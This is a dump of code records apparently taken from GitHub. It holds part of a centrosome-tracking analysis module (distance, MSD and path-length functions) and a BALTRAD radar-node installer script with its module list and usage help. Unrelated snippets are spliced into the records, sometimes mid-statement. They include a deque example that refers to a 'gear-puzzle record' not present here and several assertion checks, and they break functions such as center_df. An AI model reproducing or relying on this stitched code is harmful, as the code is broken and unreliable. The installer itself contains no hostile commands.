dist_vel_acc_centrosomes(df, cell_unit_idx=[],\n time_col='time', frame_col='frame',\n x_col='x', y_col='y',\n centrosome_label_col='centrosome'):\n def dist_between(df):\n dfu = df.set_index([frame_col, centrosome_label_col]).sort_index().unstack(centrosome_label_col)\n ddx = dfu[x_col]['A'] - dfu[x_col]['B']\n ddy = dfu[y_col]['A'] - dfu[y_col]['B']\n\n dist = (ddx ** 2 + ddy ** 2).map(np.sqrt)\n time = dfu[time_col].max(axis=1)\n dt = time.diff()\n dfu.loc[:, ('DistCentr', 'A')] = dist\n dfu.loc[:, ('DistCentr', 'B')] = dist\n dfu.loc[:, ('SpeedCentr', 'A')] = dist.diff() / dt\n dfu.loc[:, ('SpeedCentr', 'B')] = dist.diff() / dt\n dfu.loc[:, ('AccCentr', 'A')] = dist.diff().diff() / dt\n dfu.loc[:, ('AccCentr', 'B')] = dist.diff().diff() / dt\n return dfu.stack().reset_index()\n\n df = df.groupby(cell_unit_idx).apply(dist_between)\n return df.reset_index(drop=True)\n\n\ndef center_df(df):\n df = 
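rotateGear in the gear-puzzle record above rotates an 8-slot list by slicing; collections.deque.rotate is the direct equivalent, with rotate(1) moving the last element to the front (clockwise):

```python
from collections import deque

state = deque([0, 1, 1, 0, 1, 0, 1, 1])
original = list(state)
state.rotate(1)                  # clockwise: same as [s[7]] + s[0:7]
state.rotate(-1)                 # counter-clockwise: same as s[1:8] + [s[0]]
assert list(state) == original   # the two rotations cancel out
```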
df.set_index('frame').sort_index()\n time_ini = df['time'].iloc[0]\n dist_ini = df['dist'].iloc[0]\n df.loc[:, 'time_i'] = df['time'] - time_ini\n df.loc[:, 'dist_i'] = df['dist'] - dist_ini\n return df.reset_index()\n\n\ndef get_center_df(df, time='time', dist='dist', frame='frame', group=None):\n df = df.rename(columns={dist: 'dist', frame: 'frame', time: 'time'})\n dout = df.groupby(group).apply(center_df)\n return dout.reset_index(drop=True)\n\n\ndef get_msd(df, x='x', y='y', time='time', frame='frame', group=None):\n logger.debug('computing msd')\n\n def msd(df):\n \"\"\"\n Computes Mean Square Displacement as defined by:\n\n {\\rm {MSD}}\\equiv \\langle (x-x_{0})^{2}\\rangle ={\\frac {1}{N}}\\sum _{n=1}^{N}(x_{n}(t)-x_{n}(0))^{2}\n \"\"\"\n df = df.set_index(frame).sort_index()\n x0, y0 = df[x].iloc[0], df[y].iloc[0]\n _msdx = df.loc[:, x].apply(lambda x: (x - x0) ** 2)\n _msdy = df.loc[:, y].apply(lambda y: (y - y0) ** 2)\n df.loc[:, 'msd'] = _msdx + _msdy\n return df.reset_index()\n\n dfout = df.groupby(group).apply(msd)\n return dfout.reset_index(drop=True)\n\n\ndef _msd_tag(df, time='time', centrosome_label='centrosome'):\n logger.debug('classifying msd')\n pd.set_option('mode.chained_assignment', None)\n # with pd.set_option('mode.chained_assignment', 'raise')\n dfreg = msd_lreg(df.set_index(time).sort_index(), centrosome_label=centrosome_label)\n mvtag = pd.DataFrame()\n for id, _df in df.groupby('indiv'):\n c_a = dfreg[(dfreg['indiv'] == id) & (dfreg['centrosome'] == 'A')]['msd_slope'].reset_index(drop=True)\n c_b = dfreg[(dfreg['indiv'] == id) & (dfreg['centrosome'] == 'B')]['msd_slope'].reset_index(drop=True)\n if len(c_a) == 0 or len(c_b) == 0: continue\n c_a = c_a[0]\n c_b = c_b[0]\n if c_a > c_b:\n _df.loc[_df[centrosome_label] == 'A', 'msd_cat'] = 'displacing more'\n _df.loc[_df[centrosome_label] == 'B', 'msd_cat'] = 'displacing less'\n else:\n _df.loc[_df[centrosome_label] == 'B', 'msd_cat'] = 'displacing more'\n _df.loc[_df[centrosome_label] == 'A', 'msd_cat'] = 'displacing less'\n mvtag = mvtag.append(_df)\n pd.set_option('mode.chained_assignment', 'warn')\n return mvtag\n\n\ndef msd_lreg(df, centrosome_label='centrosome'):\n \"\"\"\n Computes a linear regression of the Mean Square Displacement\n \"\"\"\n from sklearn import linear_model\n msd_lr = pd.DataFrame()\n for _id, _df in df.groupby('trk'):\n # do linear regression of both tracks to see which has higher slope\n x = _df.index.values\n y = _df['msd'].values\n length = len(x)\n x = x.reshape(length, 1)\n y = y.reshape(length, 1)\n if np.isnan(y).any():\n logging.warning('MSD of track tag %d contains NaNs.' 
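The msd helper above implements the docstring's definition per track, anchored at the first frame; stripped of the pandas plumbing it is two squared differences, and straight-line motion should grow quadratically:

```python
import numpy as np

def msd_track(x: np.ndarray, y: np.ndarray) -> np.ndarray:
    # MSD(t) = (x(t) - x(0))**2 + (y(t) - y(0))**2, per frame
    return (x - x[0]) ** 2 + (y - y[0]) ** 2

t = np.arange(5, dtype=float)
assert np.allclose(msd_track(2 * t, np.zeros_like(t)), 4 * t ** 2)
```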
% _id)\n else:\n regr = linear_model.LinearRegression()\n regr.fit(x, y)\n msdlr = pd.DataFrame(data={'indiv': _df['indiv'].iloc[0],\n 'condition': _df['condition'].iloc[0],\n 'centrosome': _df[centrosome_label].iloc[0],\n 'msd_slope': [regr.coef_[0][0]],\n 'msd_intercept': [regr.intercept_[0]]})\n\n msd_lr = msd_lr.append(msdlr)\n\n return msd_lr\n\n\ndef agg_trk_length(df):\n \"\"\"\n Computes path length\n \"\"\"\n df = df.set_index('frame').sort_index()\n _dx2 = df.loc[:, 'x'].diff().apply(lambda x: x ** 2)\n _dy2 = df.loc[:, 'y'].diff().apply(lambda y: y ** 2)\n return np.sum((_dx2 + _dy2).apply(np.sqrt))\n\n\ndef trk_length(df):\n \"\"\"\n Computes path length\n \"\"\"\n df = df.set_index('frame').sort_index()\n _dx2 = df.loc[:, 'x'].diff().apply(lambda x: x ** 2)\n _dy2 = df.loc[:, 'y'].diff().apply(lambda y: y ** 2)\n df.loc[:, 's'] = np.sqrt(_dx2 + _dy2)\n df.at[0, 's'] = 0\n return df.reset_index()\n # return np.sum((_dx2 + _dy2).apply(np.sqrt))\n\n\ndef get_trk_length(df, x='x', y='y', time='time', frame='frame', group=None):\n \"\"\"\n Computes path length for each group\n \"\"\"\n df = df.rename(columns={x: 'x', y: 'y', frame: 'frame', time: 'time'})\n dfout = df.groupby(group).apply(trk_length)\n return dfout.reset_index(drop=True)\n","repo_name":"HocheggerLab/centrosome-tracking","sub_path":"mechanics.py","file_name":"mechanics.py","file_ext":"py","file_size_in_byte":7713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21466811214","text":"'''\nCreated on Jan 21, 2011\n\n@author: anders\n'''\nimport os\nimport getopt\nimport sys\n\nsys.path.append(\"../src\")\nsys.path.append(\"../bin\") # To get this directory\n\nfrom InstallerException import InstallerException\nfrom package import package\nfrom urlfetcher import urlfetcher\nfrom cmmi import cmmi\nfrom untar import untar\nfrom nodir import nodir\nfrom buildenv import buildenv\nfrom osenv import osenv\nfrom shinstaller import shinstaller\nfrom pilinstaller import pilinstaller\nfrom tomcatinstaller import tomcatinstaller\nfrom hdfjavainstaller import hdfjavainstaller\nfrom hdfjavainstaller import hdfjavasetupinstaller\nfrom machinefetcher import machinefetcher\nfrom jdkvalidator import jdkvalidator\nfrom zlibvalidator import zlibvalidator\nfrom psqlvalidator import psqlvalidator\nfrom doxygenvalidator import doxygenvalidator\nfrom hlhdfinstaller import hlhdfinstaller\nfrom bbufrinstaller import bbufrinstaller\nfrom bdbinstaller import bdbinstaller\nfrom beastinstaller import beastinstaller\nfrom dexinstaller import dexinstaller\nfrom raveinstaller import raveinstaller\nfrom ravegmapinstaller import ravegmapinstaller\nfrom bropoinstaller import bropoinstaller\nfrom beambinstaller import beambinstaller\nfrom bwrwpinstaller import bwrwpinstaller\nfrom dbinstaller import dbinstaller, dbupgrader\nfrom nodescripts import nodescripts\nfrom deployer import deployer\nfrom configinstaller import configinstaller\nfrom raveconfiginstaller import raveconfiginstaller\nfrom scriptinstaller import scriptinstaller\nfrom patcher import patcher\nfrom finished import finished\nfrom pipinstaller import pipinstaller\nfrom pipfetcher import pipfetcher\nfrom prepareinstaller import prepareinstaller\nfrom keystoreinstaller import keystoreinstaller\nfrom docinstaller import docinstaller\nfrom nullinstaller import nullinstaller\nfrom netcdfinstaller import netcdfinstaller\nfrom pychoiceinstaller import pychoiceinstaller\n\nfrom node_package import node_package\nfrom rave_package import 
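trk_length and agg_trk_length above accumulate sqrt(dx^2 + dy^2) over consecutive frames; a unit square traversed in four steps is a quick sanity check of that pattern:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'x': [0.0, 1.0, 1.0, 0.0, 0.0],
                   'y': [0.0, 0.0, 1.0, 1.0, 0.0]})
step = np.sqrt(df['x'].diff() ** 2 + df['y'].diff() ** 2)
assert np.isclose(step.sum(), 4.0)  # pandas .sum() skips the leading NaN
```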
rave_package\n\nfrom extra_functions import *\nfrom node_installer import node_installer\nfrom experimental import experimental\n\n##\n# All modules that should be installed for the baltrad node\n# Note, it is essential that the order is correct here since\n# they will be installed in this order. There is no dependency\n# checking for this.\n#\n# So, if for example HDF5 is dependent on ZLIB. ZLIB must be installed prior to\n# HDF5. But since HDF5 is dependent on ZLIB, HDF5 must get the depends set to ZLIB\n# so that HDF5 is rebuilt each time ZLIB is rebuilt.\n##\nMODULES=[prepareinstaller(package(\"PREPARE\", \"1.0\", nodir(), remembered=False)),\n shinstaller(package(\"ZLIB\", \"1.2.11\", nodir()),\":\"),\n\n cmmi(package(\"HDF5\", \"1.10.1\",\n untar(urlfetcher(\"hdf5-1.10.1.tar.gz\"), \"hdf5-1.10.1\", True),\n depends=[\"ZLIB\"]),\n \"--prefix=\\\"$TPREFIX\\\" --with-pthread=yes --enable-threadsafe --enable-unsupported\", False, True, # unsupported for MT + HL library\n foptionalarg=hdf5_optional_zlib_arg),\n \n netcdfinstaller(package(\"NETCDF\", \"4.5.0\",\n untar(urlfetcher(\"netcdf-c-4.5.0.tar.gz\"), \"netcdf-c-4.5.0\", True),\n depends=[\"ZLIB\", \"HDF5\"])),\n \n cmmi(package(\"EXPAT\", \"2.0.1\",\n untar(urlfetcher(\"expat-2.0.1.tar.gz\"), \"expat-2.0.1\", True)),\n \"--prefix=\\\"$TPREFIX\\\"\", False, True),\n \n cmmi(package(\"PROJ.4\", \"4.7.0\",\n untar(urlfetcher(\"proj-4.7.0.tar.gz\"), \"proj-4.7.0\", True)),\n \"--prefix=\\\"$TPREFIX\\\" --with-jni=\\\"$JDKHOME/include\\\"\", False, True,\n osenv({\"CFLAGS\":\"-I\\\"$JDKHOME/include/linux\\\"\"})),\n\n shinstaller(package(\"PYTHON\", \".\".join([str(x) for x in sys.version_info[:3]]), nodir()),\n \":\"),\n\n cmmi(package(\"CURL\", \"7.22.0\",\n untar(urlfetcher(\"curl-7.22.0.tar.gz\"), \"curl-7.22.0\", True)),\n \"--prefix=\\\"$TPREFIX\\\"\", False, True),\n]\n\n#MODULES.append(pipinstaller(package(\"PYCURL\", \"7.43.0.1\", \n# fetcher=pipfetcher(),\n# depends=[\"PYTHON\",\"CURL\"], \n# extra_attrs={\"pypi_name\":\"pycurl\"}),\npipoenv=osenv({\"LD_LIBRARY_PATH\":\"$TPREFIX/lib\", \"PATH\":\"$TPREFIX/bin:$$PATH\"})\n \n_PIP_MODULES=[\n (\"NUMPY\", \"1.14.2\", \"numpy\", [\"PYTHON\"], pipoenv),\n (\"PILLOW\", \"5.0.0\", \"pillow\", [\"PYTHON\"], pipoenv),\n (\"PYCRYPTO\", \"2.6.1\", \"pycrypto\", [\"PYTHON\"], None),\n (\"PYASN1\", \"0.1.2\", \"pyasn1\", [\"PYTHON\"], None),\n# (\"PYTHON-KEYCZAR\", \"0.7b\", \"python-keyczar\", [\"PYTHON\", \"PYASN1\", \"PYCRYPTO\"], None),\n (\"JPROPS\", \"2.0.2\", \"jprops\", [\"PYTHON\"], None),\n (\"LOCKFILE\", \"0.9.1\", \"lockfile\", [\"PYTHON\"], None),\n (\"PYTHON-DAEMON\", \"2.1.2\", \"python-daemon\", [\"PYTHON\", \"LOCKFILE\"], None),\n (\"PSYCOPG2\", \"2.7.3.2\", \"psycopg2\", [\"PYTHON\"], None),\n (\"DECORATOR\", \"3.3.2\", \"decorator\", [\"PYTHON\"], None),\n (\"TEMPITA\", \"0.5.1\", \"Tempita\", [\"PYTHON\"], None),\n (\"SQLALCHEMY\", \"1.0.13\", \"sqlalchemy\", [\"PYTHON\"], None),\n (\"SQLALCHEMY-MIGRATE\", \"0.10.0\", \"sqlalchemy-migrate\", [\"PYTHON\", \"SQLALCHEMY\", \"DECORATOR\", \"TEMPITA\"], None),\n (\"WERKZEUG\", \"1.0.1\", \"werkzeug\", [\"PYTHON\"], None),\n (\"PYTHON-MOCK\", \"2.0.0\", \"mock\", [\"PYTHON\"], None),\n (\"NOSE\", \"1.3.7\", \"nose\", [\"PYTHON\"], None),\n (\"PYINOTIFY\", \"0.9.3\", \"pyinotify\", [\"PYTHON\"], None),\n# (\"PROGRESSBAR\", \"2.2\", \"progressbar\", [\"PYTHON\"], None),\n (\"CHERRYPY\", \"3.2.4\", \"cherrypy\", [\"PYTHON\"], None),\n]\n\n_PIP_DEP=[]\n\nfor (name, version, pypi_name, deps, poenv) in _PIP_MODULES:\n 
MODULES.append(\n pipinstaller(\n package(\n name, version,\n fetcher=pipfetcher(),\n depends=deps,\n extra_attrs={\n \"pypi_name\": pypi_name,\n }\n ),\n oenv=poenv\n )\n )\n _PIP_DEP.append(name)\n\nMODULES.append(pipinstaller(package(\"PYTHON3-KEYCZAR\", \"0.71rc0\", fetcher=pipfetcher(), depends=[\"PYTHON\", \"PYASN1\", \"PYCRYPTO\"], extra_attrs={\"pypi_name\": \"python3_keyczar\"})))\n\nMODULES.append(pipinstaller(package(\"PROGRESSBAR33\", \"2.4\", fetcher=pipfetcher(), depends=[\"PYTHON\"], extra_attrs={\"pypi_name\": \"progressbar33\"})))\n\nMODULES.append(experimental(pipinstaller(package(\"ARGPARSE\", \"1.2.1\", fetcher=pipfetcher(), extra_attrs={\"pypi_name\": \"argparse\"})),\n nullinstaller(package(\"ARGPARSE\", \"1.2.1\", fetcher=pipfetcher(), extra_attrs={\"pypi_name\": \"argparse\"})))\n )\n\nMODULES.extend([\n tomcatinstaller(package(\"TOMCAT\", \"7.0.64-1\",\n untar(urlfetcher(\"apache-tomcat-7.0.64.tar.gz\"), \"apache-tomcat-7.0.64\", True))),\n \n hdfjavainstaller(package(\"HDFJAVA\", \"2.6.1\",\n machinefetcher({\n 'i386':untar(urlfetcher(\"hdf-java-2.6.1-i386-bin.tar\"), \"hdf-java\", False),\n 'i686':untar(urlfetcher(\"hdf-java-2.6.1-i386-bin.tar\"), \"hdf-java\", False), #i686 is 32bit\n 'x86_64':untar(urlfetcher(\"hdf-java-2.6.1-x86_64-bin.tar\"), \"hdf-java\", False)}\n ))),\n \n shinstaller(package(\"ANT\", \"1.8.0\",\n untar(urlfetcher(\"apache-ant-1.8.0-bin.tar.gz\"), \".\", True)),\n \"rm -fr \\\"$TPREFIX/ant\\\"; mv -f apache-ant-1.8.0 \\\"$TPREFIX/ant\\\"\"),\n \n hdfjavasetupinstaller(package(\"HDFJAVASETUP\", \"2.6.1\", depends=[\"TOMCAT\", \"HDFJAVA\"])),\n \n # Time to install baltrad node software\n keystoreinstaller(package(\"KEYSTORE\", \"1.1\", nodir())),\n \n hlhdfinstaller(node_package(\"HLHDF\", depends=[\"ZLIB\", \"HDF5\", \"PYTHON\"])),\n\n bbufrinstaller(node_package(\"BBUFR\", depends=[\"ZLIB\"])),\n\n bdbinstaller(node_package(\"BALTRAD-DB\", depends=[\"ZLIB\", \"HDF5\", \"HLHDF\", \"PYTHON\"])),\n \n beastinstaller(node_package(\"BEAST\", depends=[\"BALTRAD-DB\"])),\n \n dexinstaller(node_package(\"BALTRAD-DEX\", depends=[\"HDFJAVA\", \"TOMCAT\", \"BALTRAD-DB\", \"BEAST\"])),\n \n raveinstaller(rave_package(depends=[\"EXPAT\", \"PROJ.4\", \"PYTHON\", \"NUMPY\", \"PYSETUPTOOLS\", \"PYCURL\", \"HLHDF\", \"NETCDF\", \"BBUFR\", \"BALTRAD-DB\"])),\n \n ravegmapinstaller(node_package(\"RAVE-GMAP\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n bropoinstaller(node_package(\"BROPO\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n beambinstaller(node_package(\"BEAMB\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n \n bwrwpinstaller(node_package(\"BWRWP\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n docinstaller(package(\"DOCS\", \"1.0\", nodir(), remembered=False)),\n \n configinstaller(package(\"CONFIG\", \"1.0\", nodir(), remembered=False)),\n \n raveconfiginstaller(package(\"RAVECONFIG\", \"1.0\", nodir(), remembered=False)),\n \n dbinstaller(package(\"DBINSTALL\", \"1.0\", nodir())),\n \n dbupgrader(package(\"DBUPGRADE\", \"1.0\", nodir(), remembered=False)),\n\n deployer(package(\"DEPLOY\", \"1.0\", nodir(), depends=[\"BALTRAD-DEX\"], remembered=False)),\n\n scriptinstaller(package(\"SCRIPT\", \"1.0\", nodir(), remembered=False)),\n \n # Always keep this installer at the end. 
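As the comment at the head of MODULES warns, the installer relies on manual list ordering and performs no dependency resolution. The invariant (every dependency appears earlier in the list) is cheap to assert; illustrated here on plain tuples rather than the real package objects:

```python
modules = [("ZLIB", []), ("HDF5", ["ZLIB"]), ("HLHDF", ["ZLIB", "HDF5"])]
seen = set()
for name, depends in modules:
    assert all(d in seen for d in depends), f"{name} is ordered too early"
    seen.add(name)
```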
It will start the system\n # and print out relevant information.\n finished(package(\"FINISHED\", \"1.0\", nodir(), remembered=False)),\n ])\n\n# _PIP_DEP is all PIP installed packages.\n\n## FILTER FOR ALL BALTRAD-DB DEPENDENCIES\nBDB_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"PYTHON\", \"NUMPY\"]+_PIP_DEP+[\"ANT\", \"KEYSTORE\", \"HLHDF\", \"CURL\", \"PYCURL\",\n \"BALTRAD-DB\", \"DOCS\", \"CONFIG\", \"DBINSTALL\", \"DBUPGRADE\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL RAVE DEPENDENCIES. NOTE, RAVE ONLY REQUIRES BDB CLIENT API\nRAVE_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"EXPAT\", \"PROJ.4\", \"PYTHON\"]+_PIP_DEP+[\"ANT\", \"NUMPY\",\n \"PIL\", \"CURL\", \"PYCURL\", \"BALTRAD-DB\", \"KEYSTORE\", \"HLHDF\", \"BBUFR\", \n \"RAVE\", \"RAVE-GMAP\", \"BROPO\", \"BEAMB\", \"DOCS\", \"CONFIG\", \n \"RAVECONFIG\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL STANDALONE RAVE DEPENDENCIES\nSTANDALONE_RAVE=[\"ZLIB\", \"HDF5\", \"EXPAT\", \"PROJ.4\", \"PYTHON\", \"NUMPY\",\n \"PIL\", \"CURL\", \"PYCURL\", \"PYCRYPTO\", \"PYTHON-KEYCZAR\", \"PYINOTIFY\", \"HLHDF\", \"BBUFR\",\n \"RAVE\", \"RAVE-GMAP\", \"BROPO\", \"BEAMB\", \"DOCS\", \"CONFIG\", \"RAVECONFIG\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL DEX DEPENDENCIES. NOTE, DEX ONLY REQUIRES BDB CLIENT API\nDEX_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"PROJ.4\", \"PYTHON\", \"NUMPY\"]+_PIP_DEP+[\"TOMCAT\", \"HDFJAVA\", \n \"ANT\", \"HDFJAVASETUP\", \"KEYSTORE\", \"BALTRAD-DB\", \"BEAST\", \"BALTRAD-DEX\", \"DOCS\", \"CONFIG\", \"DEPLOY\", \"SCRIPT\", \"FINISHED\"]\n \n##\n# Prints the modules and the current version they have.\n#\ndef print_modules(env, modules):\n for module in modules:\n installed = \"NOT INSTALLED\"\n ver = env.getInstalled(module.package().name())\n if ver != None:\n installed = \"INSTALLED\"\n else:\n ver = module.package().version()\n print(\"{0:20s} {1:35s} {2:14s}\".format(module.package().name(),ver, installed))\n\n##\n# All valid subsystems.\nVALID_SUBSYSTEMS=[\"BDB\", \"RAVE\", \"STANDALONE_RAVE\", \"DEX\"]\n\n##\n# Filters out the relevant modules for the specific subsystems\n# \ndef filter_subsystems(modules, subsystems):\n result = []\n main_filter = []\n \n for s in subsystems:\n if not s in VALID_SUBSYSTEMS:\n raise InstallerException(\"Invalid subsystem: %s\"%s)\n \n if \"BDB\" in subsystems:\n main_filter.extend(BDB_FILTER)\n\n if \"RAVE\" in subsystems:\n main_filter.extend(RAVE_FILTER)\n\n if \"STANDALONE_RAVE\" in subsystems:\n main_filter.extend(STANDALONE_RAVE)\n\n if \"DEX\" in subsystems:\n main_filter.extend(DEX_FILTER)\n\n for module in modules:\n if module.package().name() in main_filter:\n result.append(module)\n \n return result\n\n##\n# Prints the current configuration\n#\ndef print_arguments(env):\n arguments = [(\"--prefix=\", env.getArg(\"PREFIX\")),\n (\"--tprefix=\", env.getArg(\"TPREFIX\")),\n (\"--urlrepo=\", env.getArg(\"URLREPO\")),\n (\"--dbuser=\", env.getArg(\"DBUSER\")),\n (\"--dbname=\", env.getArg(\"DBNAME\")),\n (\"--dbhost=\", env.getArg(\"DBHOST\")),\n (\"--dbport=\", env.getArg(\"DBPORT\")),\n (\"--runas=\", env.getArg(\"RUNASUSER\")),\n (\"--with-hdfjava=\", env.getArg(\"HDFJAVAHOME\")),\n (\"--nodename=\", env.getArg(\"NODENAME\"))]\n \n if env.hasArg(\"ZLIBARG\"):\n arguments.append((\"--with-zlib=\", env.getArg(\"ZLIBARG\")))\n if env.hasArg(\"FREETYPE\"):\n arguments.append((\"--with-freetype=\", env.getArg(\"FREETYPE\")))\n if env.hasArg(\"PSQLARG\"):\n arguments.append((\"--with-psql=\", env.getArg(\"PSQLARG\")))\n if env.hasArg(\"DATADIR\"):\n 
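# Editor's illustration with hypothetical data: the subsystem filtering above keeps\n        # only modules whose package name occurs in the union of the chosen filters, e.g.\n        # [m for m in [\"ZLIB\", \"HDF5\", \"TOMCAT\", \"BALTRAD-DB\"] if m in BDB_FILTER]\n        # -> ['ZLIB', 'HDF5', 'BALTRAD-DB'] for a BDB-only install.\n        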
arguments.append((\"--datadir=\", env.getArg(\"DATADIR\")))\n if env.hasArg(\"TOMCATPORT\"):\n arguments.append((\"--tomcatport=\", env.getArg(\"TOMCATPORT\")))\n if env.hasArg(\"TOMCATURL\"):\n arguments.append((\"--tomcaturl=\", env.getArg(\"TOMCATURL\")))\n if env.hasArg(\"WITH_RAVE\") and env.getArg(\"WITH_RAVE\") == True:\n arguments.append((\"--with-rave\", \"\"))\n if env.hasArg(\"WITH_RAVE_GMAP\") and env.getArg(\"WITH_RAVE_GMAP\") == True:\n arguments.append((\"--with-rave-gmap\", \"\"))\n if env.hasArg(\"WITH_BROPO\") and env.getArg(\"WITH_BROPO\") == True:\n arguments.append((\"--with-bropo\", \"\"))\n if env.hasArg(\"WITH_BEAMB\") and env.getArg(\"WITH_BEAMB\") == True:\n arguments.append((\"--with-beamb\", \"\"))\n if env.hasArg(\"JDKHOME\"):\n arguments.append((\"--jdkhome=\", env.getArg(\"JDKHOME\")))\n if env.hasArg(\"KEYSTORE\"):\n arguments.append((\"--keystore=\", env.getArg(\"KEYSTORE\")))\n if env.hasArg(\"KEYSTORE_DN\"):\n arguments.append((\"--keystoredn=\", env.getArg(\"KEYSTORE_DN\")))\n if env.hasArg(\"TOMCATSECUREPORT\"):\n arguments.append((\"--tomcatsecureport=\", env.getArg(\"TOMCATSECUREPORT\")))\n \n\n for a in arguments:\n print(\"{0:25s} {1:35s}\".format(a[0], a[1]))\n\n##\n# Prints information about usage.\n# @param brief if brief usage information should be shown or not\n# @param msg (optional). If brief == True, then this text can be shown if provided\n#\ndef usage(brief, msg=None):\n if brief == True:\n if msg != None:\n print(msg)\n print(\"Usage: setup command, use --help for information\")\n else:\n print(\"\"\"\nNODE INSTALLER\nUsage: setup command, use --help for information\n\nThis is the main installation script for installing a baltrad node.\nMost of the installation is handled without any interaction. However\nif you don't want to specify --tomcatpwd on command line you will\nget a question about it. \n\nThe script will remember several configuration parameters between\nruns but some of them will not be stored, like passwords and\nsimilar items. If you want to use the previous parameters, then\nyou can specify --recall-last-args\n\nCommand:\nValid commands are:\n - install\n Installs the software\n \n - check\n Checks that the provided dependencies are correct\n\n - clean\n Cleans up everything\n\n - fetch\n Fetch all packages so that it is possible to run an installation\n in 'offline' mode. It will atempt to clean up any unessecary \n content but it is suggested to execute clean prior fetch.\n \n - dist\n Create distribution tarball\n \nOptions:\n--help\n Shows this text\n\n--enable-py3\n If you want the system to be built with python3.\n \n--use-ravepy3-repo\n Special variant if you want to use the rave-py3 repository even if you want to install the node with python 2.7.\n This is only really relevant if --enable-py3 isn't specified.\n\n--recall-last-args\n If you want to use the previous arguments, then you can use\n this option. It will try to restore the configuration parameters\n used in the last run. \n\n--nodename=\n This attribute should really be specified but there is a default value which\n is the hostname as shown by the command 'hostname'. The node name is a unique\n identifier that is used for identifying you within the exchange\n network. The node name should usually explain exactly who you are. A good\n example is to use the java package naming. For example se.myorg or se.myorg.test or similar. 
\n This node name will also define what this installation's key will be named.\n\n--prefix=<path>\n Points out where the system should be installed. \n [Default /opt/baltrad]\n \n--tprefix=<path>\n Points out where the third-party software should be installed.\n [Default <prefix>/third_party]\n \n--jdkhome=<jdkhome>\n Points out the jdkhome directory. If omitted, the installer will\n try to find a valid jdk.\n\n--keystore=<path>\n Points out the keystore directory to use when setting up the\n different modules for certification. If not specified, one will be\n created for you in /etc/bltnode-keystore.\n\n--with-zlib=yes|no|<zlibroot>|<zlibinc>,<zliblib>\n Specifies if zlib should be built by the installer or not. \n [Default yes]\n - 'yes' means that the installer should install the provided zlib\n - 'no' means that the installer should attempt to locate a valid\n zlib installation\n - <zlibroot> specifies a zlib installation where includes can be \n found in <zlibroot>/include and libraries can be found in \n <zlibroot>/lib\n - <zlibinc>,<zliblib> can be used to point out the specific \n include and library paths\n\n--with-psql=<psqlroot>|<psqlinc>,<psqllib>\n Specifies where to locate the postgresql include and library files.\n If omitted, the install script assumes that they can be found in \n the standard locations.\n - <psqlroot> specifies a postgres installation where includes can be \n found in <psqlroot>/include and libraries can be found in <psqlroot>/lib\n - <psqlinc>,<psqllib> can be used to point out the specific \n include and library paths\n\n--enable-netcdf\n Specifies if netcdf should be built. It can for example be used for exporting\n CF compliant products from rave. Unfortunately it is not possible to specify an\n external variant of netcdf, since netcdf is based on hdf5 and that is also built\n by this installer. Default is not to enable netcdf support.\n \n--with-freetype=<freetypeinc>,<freetypelib>\n In order to get freetype support built into the PIL imaging library\n (for use with the google maps plugin) you might have to specify this\n library. <freetypeinc> is the path to the freetype include directory\n as shown when executing freetype-config --cflags, excluding the -I of course.\n <freetypelib> is the path where libfreetype.so can be found.\n\n--dbuser=<user>\n Specifies the database user to use. \n [Default baltrad]\n\n--dbpwd=<pwd>\n Specifies the database user password to use. \n [Default baltrad]\n \n--dbname=<name>\n Specifies the database name to use. \n [Default baltrad]\n\n--dbhost=<host>\n Specifies the database host to use. \n [Default 127.0.0.1]\n\n--dbport=<port>\n Specifies the database port number to use. \n [Default 5432]\n\n--with-hdfjava=<path>\n Specifies the hdf java root installation directory. \n If omitted, the installer will install its own version of hdf-java.\n \n--reinstalldb\n Reinstalls the database tables. Use with care.\n\n--excludedb\n Ignores installation of the database tables, for example because they\n have already been installed. This will cause the DBINSTALL package\n to be set as installed.\n \n--runas=<user>\n Specifies the runas user for tomcat and other processes. It is not \n allowed to use a runas user that is root, due to security issues. 
\n [Defaults to the user that is installing]\n\n--datadir=<path>\n The directory where all the data storage files should be placed for baltrad-db.\n [Default <prefix>/bdb_storage]\n\n--urlrepo=<url>\n The url from where the url packages can be fetched.\n [Default http://ni.baltrad.eu]\n \n--gitrepo=<url>\n The url from where the baltrad node git packages can be fetched.\n For example \"--gitrepo=https://github.com/baltrad\" \n [Default https://github.com/baltrad]\n\n--with-rave\n Install the rave pgf\n\n--rave-pgf-port=<port>\n Set the port rave should run on.\n [default: 8085]\n\n--rave-log-port=<port>\n Set the port the rave logger should run on\n [default: 8089]\n\n--with-bufr\n Install the bufr software. This also affects rave: if bufr support is\n specified, rave will be built with bufr support enabled as well.\n\n--rave-center-id=<id>\n Originating center id to be used by rave as the source of its products.\n [default: 82]\n\n--rave-dex-spoe=<host:port>\n Dex's single point of entry to be used by rave. \n [default: localhost:8080]\n \n--with-rave-gmap\n Install the rave google map plugin. Will also cause the rave pgf to be installed.\n\n--with-bropo\n Install the anomaly detector bropo. Will also cause rave to be installed.\n\n--with-beamb\n Install the beam blockage detector beamb. Will also cause rave to be installed.\n\n--with-bwrwp\n Installs the baltrad weather radar wind profile generator. Will also cause rave to be installed.\n This is a very special product generator that uses fortran code and requires for example gfortran.\n This product more or less requires that the following options also are specified: --with-blas=,\n --with-cblas=, --with-lapack= and --with-lapacke=.\n\n--with-blas=<libblasroot>\n Specifies the directory where the libblas.a library resides. Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities,\n since it will be linked into a shared library.\n\n--with-cblas=<cblasroot> or <cblasinc>,<cblaslib>\n Specifies where the cblas.h include directory and the libcblas.a directory reside. You can also\n specify a cblas root directory that should contain the include and lib directories.\n Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities,\n since it will be linked into a shared library.\n\n--with-lapack=<liblapackroot>\n Specifies the directory where the liblapack.a library 